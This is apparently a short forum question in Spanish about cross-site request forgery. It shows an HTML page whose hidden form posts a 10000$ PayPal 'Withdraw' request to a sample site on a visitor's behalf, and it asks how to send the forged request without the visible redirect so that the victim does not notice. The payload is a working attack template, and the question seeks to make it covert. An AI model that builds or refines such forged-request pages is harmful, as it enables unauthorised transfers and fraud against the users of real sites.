¿Hay alguna forma de falsificar una solicitud de publicación sin ser redirigido a la página donde se envían los parámetros? Por ejemplo:
<html>
<head>
<title>
CRSF example
</title>
</head>
<body onload="">
<form action="http://www.somesite.org/action.php" method="POST">
<input type="hidden" name="money" value="10000$"/>
<input type="hidden" name="payment" value="Paypal"/>
<input type="hidden" name="user" value="user1"/>
<input type="submit" name="submit" value="Withdraw"/>
</form>
</body>
</html>
Cuando el usuario visita esta página, se activa csrf y se envían los valores y se produce la redirección. Se pueden enviar estos valuse sin redirección. Gracias